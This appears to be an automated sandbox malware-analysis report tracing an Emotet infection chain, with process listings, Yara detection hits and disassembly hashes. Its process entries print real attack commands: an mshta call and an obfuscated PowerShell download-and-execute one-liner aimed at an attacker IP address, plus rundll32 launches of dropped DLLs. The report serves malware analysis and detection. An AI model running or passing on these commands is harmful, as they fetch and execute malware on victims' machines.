                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:21:14:17
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd
                                                                                                                    Imagebase:0x4a030000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:14:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.172/ee/ss/se.html
                                                                                                                    Imagebase:0x13fd10000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:14:20
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13f180000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:14:29
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                                                                                                    Imagebase:0x4a3f0000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:11
                                                                                                                    Start time:21:14:30
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:14:35
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:13
                                                                                                                    Start time:21:15:00
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:15:07
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:16
                                                                                                                    Start time:21:15:25
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:17
                                                                                                                    Start time:21:15:30
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Executed Functions

                                                                                                                      Function 034D1CE3 Relevance: .4, Instructions: 431COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction ID: 72c49df134117eb98bb493dc04b5b75b066f6c1665bf9da9474c80993d823b0d
                                                                                                                      • Opcode Fuzzy Hash: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction Fuzzy Hash: 83D1F42061CA884FCB89DB2C8164621BBE1FF5D305B5949DFE49EDF396DA20CC81C799
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 034D1CE3 Relevance: .4, Instructions: 431COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D1000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction ID: 72c49df134117eb98bb493dc04b5b75b066f6c1665bf9da9474c80993d823b0d
                                                                                                                      • Opcode Fuzzy Hash: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction Fuzzy Hash: 83D1F42061CA884FCB89DB2C8164621BBE1FF5D305B5949DFE49EDF396DA20CC81C799
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 034D311F Relevance: .2, Instructions: 227COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction ID: c418a0d34ded132cd974b209c54d1d09d531845709ea79c828514583e22cca99
                                                                                                                      • Opcode Fuzzy Hash: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction Fuzzy Hash: 3151E62071CA484FCB49EF1C8969A21B7E1FB5D300B5944EFE49ACB396DA24CC918796
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 034D311F Relevance: .2, Instructions: 227COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D3000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction ID: c418a0d34ded132cd974b209c54d1d09d531845709ea79c828514583e22cca99
                                                                                                                      • Opcode Fuzzy Hash: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction Fuzzy Hash: 3151E62071CA484FCB49EF1C8969A21B7E1FB5D300B5944EFE49ACB396DA24CC918796
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
